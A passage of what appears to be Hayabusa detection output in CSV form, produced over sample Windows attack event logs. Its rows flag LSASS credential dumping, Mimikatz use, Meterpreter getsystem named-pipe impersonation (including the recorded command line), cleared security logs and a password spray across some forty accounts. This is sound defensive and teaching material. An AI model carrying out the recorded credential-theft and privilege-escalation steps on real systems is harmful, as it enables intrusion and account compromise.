Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx -2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 16:46:15.215 
+09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 
0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:thessman/edygert/rbowes/jwright/celgee/ebooth/cmoody/tbennett/melliott/jlake/cfleener/psmith/drook/dpendolino/Administrator/wstrzelec/mdouglas/cspizor/cragoso/bhostetler/jleytevidal/sarmstrong/baker/gsalinas/lschifano/cdavis/jorchilles/bking/ssims/zmathis/econrad/smisenar/eskoudis/mtoussain/dmashburn/kperryman/jkulikowski/bgreenwood/lpesce/sanson/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- -2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
